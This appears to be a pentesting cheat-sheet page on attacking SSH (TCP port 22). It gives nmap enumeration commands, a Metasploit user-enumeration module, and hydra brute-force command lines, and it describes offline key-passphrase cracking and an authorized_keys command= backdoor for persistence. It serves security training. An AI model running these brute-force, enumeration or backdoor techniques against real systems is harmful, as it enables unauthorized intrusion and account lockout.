Infiltr8ForumGitHub

SSH

Pentesting SSH - TCP Port 22

Theory

SSH or Secure Shell or Secure Socket Shell, is a network protocol that gives users a secure way to access a computer over an unsecured network.

SHH protocol operate by default on TCP port 22

Practice

Enumerate SSH server

We can use nmap to enumerate informations about the running SSH server

# Send default nmap scripts for SSH and retreive version
nmap -p22 <ip> -sC -sV

# Send all nmap ssh related scripts
nmap -p22 <ip> --script ssh-*

# Retrieve supported algorythms 
nmap -p22 <ip> --script ssh2-enum-algos

# Retrieve weak keys
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full

# Check authentication methods for an user
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root"

Enumerate Users

In some versions of OpenSSH you can make a timing attack to enumerate users. You can use a metasploit module in order to exploit this:

msfconsole
msf> use auxiliary/scanner/ssh/ssh_enumusers

Brute-Force Credentials

If the target host opens port 80 or 443, you can generate wordlist from the contents of the website then use it with your tool.

When bruteforcing accounts, you may lock accounts

# -t : Number of tasks
# -L/l : username list / username 
# -P/p : password list / password
hydra -l username -P passwords.txt <target-ip> ssh -t 4
hydra -L usernames.txt -p password <target-ip> ssh -t 4

# -s : Specific port
hydra -l username -P passwords.txt -s 2222 <target-ip> ssh -t 4
hydra -l username -P passwords.txt ssh://<target-ip>:2222 -t 4

Crack SSH Private Key

Some private keys require a password or passphrase for operation, so we may attempt to Brute Force the passphrase off-line.

SSH Private Keys

Persistence

It's possible to backdoor an SSH public key using the command= argument. The backdoor will execute whenever the user logs in using this key.

SSH

Resources

Logo22 - Pentesting SSH/SFTPHackTricks
LogoSSH (Secure Shell) Pentesting | Exploit Noteshideckies

Last updated